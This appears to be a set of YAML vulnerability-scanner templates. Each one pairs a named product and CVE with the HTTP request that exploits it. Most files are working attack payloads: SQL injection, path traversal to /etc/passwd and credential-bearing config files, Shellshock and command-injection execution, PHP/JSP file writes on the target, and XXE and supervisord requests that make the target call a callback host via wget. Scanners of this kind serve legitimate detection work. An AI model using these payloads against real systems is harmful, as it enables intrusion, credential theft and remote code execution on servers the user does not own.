1 | name: poc-yaml-seeyon-cnvd-2020-62422-readfile 2 | rules: 3 | - method: GET 4 | path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties 5 | follow_redirects: false 6 | expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") 7 | detail: 8 | author: Aquilao(https://github.com/Aquilao) 9 | info: seeyon readfile(CNVD-2020-62422) 10 | links: 11 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 12 | -------------------------------------------------------------------------------- /pkg/pocs/seeyon-wooyun-2015-0108235-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-0108235-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5({{rand}}),7-- 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | links: 12 | - https://bugs.shuimugan.com/bug/view?bug_no=0108235 13 | -------------------------------------------------------------------------------- /pkg/pocs/seeyon-wooyun-2015-148227.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-148227 2 | rules: 3 | - method: GET 4 | path: /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(bytes("NCInvokerServlet")) 8 | detail: 9 | author: canc3s(https://github.com/canc3s) 10 | links: 11 | - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html 12 | -------------------------------------------------------------------------------- /pkg/pocs/solarwinds-cve-2020-10148.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-solarwinds-cve-2020-10148 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /web.config.i18n.ashx?l=en-US&v={{r1}} 7 | expression: | 8 | response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl")) 9 | detail: 10 | author: su(https://suzzz112113.github.io/#blog) 11 | CVE: CVE-2020-10148 12 | links: 13 | - https://kb.cert.org/vuls/id/843464 -------------------------------------------------------------------------------- /pkg/pocs/solr-cve-2017-12629-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-solr-cve-2017-12629-xxe 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: GET 7 | path: "/solr/admin/cores?wt=json" 8 | expression: "true" 9 | search: | 10 | "name":"(?P[^"]+)", 11 | - method: GET 12 | path: /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22{{reverseURL}}%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser 13 | follow_redirects: true 14 | expression: | 15 | reverse.wait(5) 16 | detail: 17 | author: sharecast 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE 20 | -------------------------------------------------------------------------------- /pkg/pocs/sonarqube-cve-2020-27986-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonarqube-cve-2020-27986-unauth 2 | rules: 3 | - method: GET 4 | path: "/api/settings/values" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"sonaranalyzer-cs.nuget.packageVersion"))) && response.body.bcontains(bytes(string(b"sonar.core.id"))) && response.content_type.contains("application/json") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "sonarqube < 8.4.2.36762" 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2020-27986 12 | -------------------------------------------------------------------------------- /pkg/pocs/sonicwall-ssl-vpn-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonicwall-ssl-vpn-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(1140000, 1144800) 5 | rules: 6 | - method: GET 7 | path: /cgi-bin/jarrewrite.sh 8 | follow_redirects: false 9 | headers: 10 | X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ 17 | -------------------------------------------------------------------------------- /pkg/pocs/spark-api-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-api-unauth 2 | rules: 3 | - method: GET 4 | path: /v1/submissions 5 | expression: | 6 | response.status == 400 && response.body.bcontains(b"Missing an action") && response.body.bcontains(b"serverSparkVersion") 7 | detail: 8 | author: betta(https://github.com/betta-cyber) 9 | links: 10 | - https://xz.aliyun.com/t/2490 11 | -------------------------------------------------------------------------------- /pkg/pocs/spark-webui-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-webui-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | expression: response.status == 200 && response.body.bcontains(b"Spark") && response.body.bcontains(b"<strong>URL:</strong> spark:") 6 | detail: 7 | links: 8 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc -------------------------------------------------------------------------------- /pkg/pocs/spring-cloud-cve-2020-5405.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5405 2 | rules: 3 | - method: GET 4 | path: >- 5 | /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit.")) 9 | 10 | detail: 11 | version: <= 2.1.6, 2.2.1 12 | author: kingkk(https://www.kingkk.com/) 13 | links: 14 | - https://pivotal.io/security/cve-2020-5405 15 | - https://github.com/spring-cloud/spring-cloud-config -------------------------------------------------------------------------------- /pkg/pocs/spring-cloud-cve-2020-5410.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5410 2 | rules: 3 | - method: GET 4 | path: >- 5 | /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: Soveless(https://github.com/Soveless) 10 | Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9" 11 | links: 12 | - https://xz.aliyun.com/t/7877 -------------------------------------------------------------------------------- /pkg/pocs/spring-cve-2016-4977.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cve-2016-4977 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test 8 | follow_redirects: false 9 | expression: > 10 | response.body.bcontains(bytes(string(r1 * r2))) 11 | detail: 12 | Affected Version: "spring(2.0.0-2.0.9 1.0.0-1.0.5)" 13 | author: hanxiansheng26(https://github.com/hanxiansheng26) 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977 16 | -------------------------------------------------------------------------------- /pkg/pocs/springboot-env-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springboot-env-unauth 2 | groups: 3 | spring1: 4 | - method: GET 5 | path: /env 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") 8 | spring2: 9 | - method: GET 10 | path: /actuator/env 11 | expression: | 12 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") 13 | detail: 14 | links: 15 | - https://github.com/LandGrey/SpringBootVulExploit 16 | -------------------------------------------------------------------------------- /pkg/pocs/springcloud-cve-2019-3799.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springcloud-cve-2019-3799 2 | rules: 3 | - method: GET 4 | path: >- 5 | /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | 10 | detail: 11 | version: <2.1.2, 2.0.4, 1.4.6 12 | author: Loneyer 13 | links: 14 | - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799 15 | -------------------------------------------------------------------------------- /pkg/pocs/supervisord-cve-2017-11610.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-supervisord-cve-2017-11610 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: /RPC2 8 | body: >- 9 | <?xml version="1.0"?> 10 | <methodCall> 11 | <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName> 12 | <params> 13 | <param> 14 | <string>wget {{reverseURL}}</string> 15 | </param> 16 | </params> 17 | </methodCall> 18 | follow_redirects: false 19 | expression: | 20 | response.status == 200 && reverse.wait(5) 21 | detail: 22 | author: Loneyer 23 | links: 24 | - https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610 25 | -------------------------------------------------------------------------------- /pkg/pocs/tensorboard-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tensorboard-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"The TensorFlow Authors. All Rights Reserved.") 8 | - method: GET 9 | path: '/data/plugins_listing' 10 | follow_redirects: true 11 | expression: | 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"profile") && response.body.bcontains(b"distributions") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://www.tensorflow.org/guide/summaries_and_tensorboard?hl=zh-CN 17 | -------------------------------------------------------------------------------- /pkg/pocs/terramaster-cve-2020-15568.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-terramaster-cve-2020-15568 2 | set: 3 | r1: randomLowercase(10) 4 | rules: 5 | - method: GET 6 | path: /include/exportUser.php?type=3&cla=application&func=_exec&opt=(id;whoami)%3E{{r1}} 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 10 | - method: GET 11 | path: /include/{{r1}} 12 | expression: | 13 | response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && response.body.bcontains(b"root") 14 | detail: 15 | author: albertchang 16 | Affected Version: "TOS version 4.1.24 and below" 17 | links: 18 | - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ 19 | -------------------------------------------------------------------------------- /pkg/pocs/terramaster-cve-2020-28188-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-terramaster-cve-2020-28188-rce 2 | set: 3 | r2: randomLowercase(10) 4 | rules: 5 | - method: GET 6 | path: /include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>"%20>>%20/usr/www/{{r2}}.php%20&&%20chmod%20755%20/usr/www/{{r2}}.php|| 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes("Service,DateTime")) && response.status == 200 && "text/csv" in response.headers 10 | - method: GET 11 | path: /{{r2}}.php 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && md5(r2).contains(md5(r2)) 15 | detail: 16 | author: 1au 17 | links: 18 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1548 19 | -------------------------------------------------------------------------------- /pkg/pocs/thinkadmin-v6-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkadmin-v6-readfile 2 | rules: 3 | - method: GET 4 | path: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 5 | follow_redirects: true 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes("PD9waH")) && response.body.bcontains(bytes("VGhpbmtBZG1pbg")) 8 | detail: 9 | author: 0x_zmz(github.com/0x-zmz) 10 | info: thinkadmin-v6-readfile By 0x_zmz 11 | links: 12 | - https://mp.weixin.qq.com/s/3t7r7FCirDEAsXcf2QMomw 13 | - https://github.com/0x-zmz 14 | -------------------------------------------------------------------------------- /pkg/pocs/thinkcmf-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-lfi 2 | 3 | rules: 4 | - method: GET 5 | path: "/?a=display&templateFile=README.md" 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) 8 | 9 | detail: 10 | author: JerryKing 11 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 12 | links: 13 | - https://www.freebuf.com/vuls/217586.html 14 | -------------------------------------------------------------------------------- /pkg/pocs/thinkcmf-write-shell.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-write-shell 2 | set: 3 | r: randomInt(10000, 20000) 4 | r1: randomInt(1000000000, 2000000000) 5 | rules: 6 | - method: GET 7 | path: "/index.php?a=fetch&content=%3C?php+file_put_contents(%22{{r}}.php%22,%22%3C?php+echo+{{r1}}%3B%22)%3B" 8 | expression: "true" 9 | - method: GET 10 | path: "/{{r}}.php" 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1))) 13 | 14 | detail: 15 | author: violin 16 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 17 | links: 18 | - https://www.freebuf.com/vuls/217586.html 19 | -------------------------------------------------------------------------------- /pkg/pocs/thinkphp-v6-file-write.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp-v6-file-write 2 | set: 3 | f1: randomInt(800000000, 900000000) 4 | rules: 5 | - method: GET 6 | path: /{{f1}}.php 7 | follow_redirects: true 8 | expression: | 9 | response.status == 404 10 | - method: GET 11 | path: / 12 | headers: 13 | Cookie: PHPSESSID=../../../../public/{{f1}}.php 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].contains(string(f1)) 17 | - method: GET 18 | path: /{{f1}}.php 19 | follow_redirects: true 20 | expression: | 21 | response.status == 200 && response.content_type.contains("text/html") 22 | detail: 23 | author: Loneyer 24 | Affected Version: "Thinkphp 6.0.0" 25 | links: 26 | - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write 27 | -------------------------------------------------------------------------------- /pkg/pocs/thinkphp5-controller-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5-controller-rce 2 | rules: 3 | - method: GET 4 | path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 5 | expression: | 6 | response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") 7 | 8 | detail: 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce -------------------------------------------------------------------------------- /pkg/pocs/thinkphp5023-method-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5023-method-rce 2 | rules: 3 | - method: POST 4 | path: /index.php?s=captcha 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: | 8 | _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1 9 | expression: | 10 | response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1") 11 | detail: 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce -------------------------------------------------------------------------------- /pkg/pocs/tomcat-cve-2017-12615-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tomcat-cve-2017-12615-rce 2 | set: 3 | filename: randomLowercase(6) 4 | verifyStr: randomLowercase(12) 5 | commentStr: randomLowercase(12) 6 | rules: 7 | - method: PUT 8 | path: '/{{filename}}.jsp/' 9 | body: '{{verifyStr}} <%-- {{commentStr}} --%>' 10 | follow_redirects: false 11 | expression: | 12 | response.status == 201 13 | - method: GET 14 | path: '/{{filename}}.jsp' 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr)) 18 | detail: 19 | author: j4ckzh0u(https://github.com/j4ckzh0u) 20 | links: 21 | - https://www.seebug.org/vuldb/ssvid-96562 22 | - https://mp.weixin.qq.com/s/sulJSg0Ru138oASiI5cYAA 23 | -------------------------------------------------------------------------------- /pkg/pocs/tomcat-cve-2018-11759.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tomcat-cve-2018-11759 2 | rules: 3 | - method: GET 4 | path: /jkstatus; 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body) 8 | - method: GET 9 | path: /jkstatus;?cmd=dump 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && "ServerRoot=*".bmatches(response.body) 13 | detail: 14 | author: loneyer 15 | links: 16 | - https://github.com/immunIT/CVE-2018-11759 17 | -------------------------------------------------------------------------------- /pkg/pocs/tongda-meeting-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tongda-meeting-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: >- 5 | /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay 6 | headers: 7 | User-Agent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36' 8 | Accept-Encoding: 'deflate' 9 | follow_redirects: false 10 | expression: | 11 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle"))) 12 | detail: 13 | author: 清风明月(www.secbook.info) 14 | influence_version: ' < 通达OA 11.5' 15 | links: 16 | - https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA 17 | -------------------------------------------------------------------------------- /pkg/pocs/tpshop-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tpshop-sqli 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /mobile/index/index2/id/1) and (select 1 from (select count(*),concat(0x716b627671,(select md5({{r}})),0x716b627671,floor(rand(0)*2))x from information_schema.tables group by x)a)-- 8 | follow_redirects: true 9 | expression: | 10 | response.body.bcontains(bytes(md5(string(r)))) 11 | detail: 12 | author: hanxiansheng26(https://github.com/hanxiansheng26) 13 | Affected Version: "tpshop<3.0" 14 | links: 15 | - https://xz.aliyun.com/t/6635 -------------------------------------------------------------------------------- /pkg/pocs/ueditor-cnvd-2017-20077-file-upload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ueditor-cnvd-2017-20077-file-upload 2 | rules: 3 | - method: GET 4 | path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: 'UEditor v1.4.3.3' 13 | links: 14 | - https://zhuanlan.zhihu.com/p/85265552 15 | - https://www.freebuf.com/vuls/181814.html 16 | exploit: >- 17 | http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 18 | -------------------------------------------------------------------------------- /pkg/pocs/uwsgi-cve-2018-7490.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-uwsgi-cve-2018-7490 2 | rules: 3 | - method: GET 4 | path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490 -------------------------------------------------------------------------------- /pkg/pocs/vbulletin-cve-2019-16759-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vbulletin-cve-2019-16759-bypass 2 | set: 3 | f1: randomInt(800000000, 900000000) 4 | rules: 5 | - method: POST 6 | path: /ajax/render/widget_tabbedcontainer_tab_panel 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | subWidgets[0][template]=widget_php&subWidgets[0][config][code]=var_dump(md5({{f1}})); 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(substr(md5(string(f1)), 0, 31))) && response.content_type.contains("application/json") 14 | detail: 15 | author: Loneyer 16 | links: 17 | - https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ 18 | -------------------------------------------------------------------------------- /pkg/pocs/vbulletin-cve-2019-16759.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vbulletin-cve-2019-16759 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: / 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5({{rand}}))%3bexit%3b 11 | follow_redirects: true 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(rand)))) 14 | detail: 15 | author: JingLing(https://hackfun.org/) 16 | vbulletion_version: 5.0.0 - 5.5.4 17 | links: 18 | - https://securityaffairs.co/wordpress/91689/hacking/unpatched-critical-0-day-vbulletin.html 19 | - https://xz.aliyun.com/t/6419 20 | -------------------------------------------------------------------------------- /pkg/pocs/vmware-vcenter-arbitrary-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vmware-vcenter-arbitrary-file-read 2 | groups: 3 | win: 4 | - method: GET 5 | path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") 9 | linux: 10 | - method: GET 11 | path: /eam/vib?id=/etc/passwd 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 15 | detail: 16 | author: MrP01ntSun(https://github.com/MrPointSun) 17 | links: 18 | - https://t.co/LfvbyBUhF5 19 | -------------------------------------------------------------------------------- /pkg/pocs/weaver-ebridge-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weaver-ebridge-file-read 2 | groups: 3 | linux: 4 | - method: GET 5 | path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt" 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id") 9 | search: | 10 | \"id\"\:\"(?P<var>.+?)\"\, 11 | - method: GET 12 | path: "/file/fileNoLogin/{{var}}" 13 | follow_redirects: false 14 | expression: | 15 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 16 | 17 | windows: 18 | - method: GET 19 | path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt 20 | follow_redirects: false 21 | expression: | 22 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id") 23 | search: | 24 | \"id\"\:\"(?P<var>.+?)\"\, 25 | - method: GET 26 | path: /file/fileNoLogin/{{var}} 27 | follow_redirects: false 28 | expression: | 29 | response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) 30 | detail: 31 | author: mvhz81 32 | info: e-bridge-file-read for Linux 33 | links: 34 | - https://mrxn.net/Infiltration/323.html 35 | -------------------------------------------------------------------------------- /pkg/pocs/weblogic-cve-2020-14750.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weblogic-cve-2020-14750 2 | rules: 3 | - method: GET 4 | path: /console/images/%252E./console.portal 5 | follow_redirects: false 6 | expression: | 7 | response.status == 302 && (response.body.bcontains(bytes("/console/console.portal")) || response.body.bcontains(bytes("/console/jsp/common/NoJMX.jsp"))) 8 | detail: 9 | author: canc3s(https://github.com/canc3s),Soveless(https://github.com/Soveless) 10 | weblogic_version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 11 | links: 12 | - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html 13 | -------------------------------------------------------------------------------- /pkg/pocs/weblogic-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weblogic-ssrf 2 | rules: 3 | - method: GET 4 | path: >- 5 | /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700 6 | headers: 7 | Cookie: >- 8 | publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; 9 | follow_redirects: false 10 | expression: >- 11 | response.status == 200 && (response.body.bcontains(b"'127.1.1.1', port: '700'") || response.body.bcontains(b"Socket Closed")) 12 | -------------------------------------------------------------------------------- /pkg/pocs/webmin-cve-2019-15107-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-webmin-cve-2019-15107-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /password_change.cgi 8 | headers: 9 | Referer: "{{url}}" 10 | body: user=roovt&pam=&expired=2&old=expr%20{{r1}}%20%2b%20{{r2}}&new1=test2&new2=test2 11 | follow_redirects: false 12 | expression: > 13 | response.body.bcontains(bytes(string(r1 + r2))) 14 | detail: 15 | author: danta 16 | description: Webmin 远程命令执行漏洞(CVE-2019-15107) 17 | links: 18 | - https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107 19 | -------------------------------------------------------------------------------- /pkg/pocs/wordpress-cve-2019-19985-infoleak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-cve-2019-19985-infoleak 2 | rules: 3 | - method: GET 4 | path: "/wp-admin/admin.php?page=download_report&report=users&status=all" 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) 8 | detail: 9 | author: bufsnake(https://github.com/bufsnake) 10 | links: 11 | - https://www.exploit-db.com/exploits/48698 12 | -------------------------------------------------------------------------------- /pkg/pocs/wordpress-ext-adaptive-images-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-ext-adaptive-images-lfi 2 | rules: 3 | - method: GET 4 | path: >- 5 | /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST") 9 | detail: 10 | author: FiveAourThe(https://github.com/FiveAourThe) 11 | links: 12 | - https://www.anquanke.com/vul/id/1674598 13 | - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 14 | -------------------------------------------------------------------------------- /pkg/pocs/wordpress-ext-mailpress-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-ext-mailpress-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/wp-content/plugins/mailpress/mp-includes/action.php" 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: | 11 | action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php echo {{r}}%2b{{r1}};?>&html=&plaintext=&mail_format=standard&autosave=1 12 | expression: "true" 13 | search: | 14 | <autosave id='(?P<id>.+?)' 15 | - method: GET 16 | path: "/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id={{id}}" 17 | expression: | 18 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 19 | 20 | detail: 21 | author: violin 22 | links: 23 | - https://github.com/Medicean/VulApps/tree/master/w/wordpress/2 24 | -------------------------------------------------------------------------------- /pkg/pocs/wuzhicms-v410-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wuzhicms-v410-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed05") && response.body.bcontains(b"sql_error:MySQL Query Error") 9 | detail: 10 | author: leezp 11 | Affected Version: "wuzhicms-v4.1.0" 12 | vuln_url: "/api/sms_check.php" 13 | links: 14 | - https://github.com/wuzhicms/wuzhicms/issues/184 15 | 